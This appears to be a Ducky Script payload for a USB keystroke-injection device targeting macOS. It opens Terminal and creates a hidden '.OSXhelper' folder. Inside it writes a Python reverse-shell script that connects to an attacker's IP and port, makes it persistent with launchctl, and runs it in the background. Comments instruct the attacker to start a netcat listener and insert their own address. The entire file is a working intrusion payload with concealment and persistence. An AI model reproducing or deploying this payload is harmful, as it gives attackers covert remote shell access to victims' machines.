REM ***on attacker machine type 'netcat -l -p 8888'***
REM 
DELAY 3000
GUI SPACE
DELAY 1500
STRING terminal
DELAY 1000
ENTER
DELAY 4500
STRING cd ~
ENTER
DELAY 1500
STRING mkdir .OSXhelper
ENTER
DELAY 1500
STRING cd .OSXhelper
ENTER
DELAY 1500
REM ***replace IP Address with your attacking machine***
STRING echo "python -c 'import socket, subprocess, os;
STRING s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
STRING s.connect((\"192.168.0.89\",8888));
STRING os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
STRING p=subprocess.call([\"/bin/sh\",\"-i\"]);'" > helper.sh
ENTER
DELAY 1500
STRING chmod +rwx helper.sh
ENTER
DELAY 1500
STRING launchctl submit -l yes -p ~/.OSXhelper/helper.sh
ENTER
DELAY 1500
STRING ./helper.sh&
ENTER
DELAY 1500
GUI m
DELAY 1500
